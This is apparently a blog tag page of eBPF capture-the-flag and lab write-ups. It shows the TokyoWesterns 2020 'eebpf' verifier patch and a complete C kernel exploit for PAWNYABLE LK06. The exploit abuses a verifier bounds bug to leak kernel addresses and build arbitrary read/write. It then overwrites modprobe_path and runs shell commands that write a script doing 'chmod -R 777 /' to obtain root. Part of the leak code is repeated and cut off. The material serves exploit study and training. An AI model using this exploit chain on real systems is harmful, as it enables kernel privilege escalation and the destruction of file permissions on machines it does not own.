Posts for: #EBPF

TokyoWesternsCTF2020 eebpf


Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And related location is following:

Read more →

PAWNYABLE LK06: Brahman


LK06: Brahman

Exploit using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);
  for (size_t i = 0; i < new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  return 0;
}

Leaks

Leak addr of struct bpf_map using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

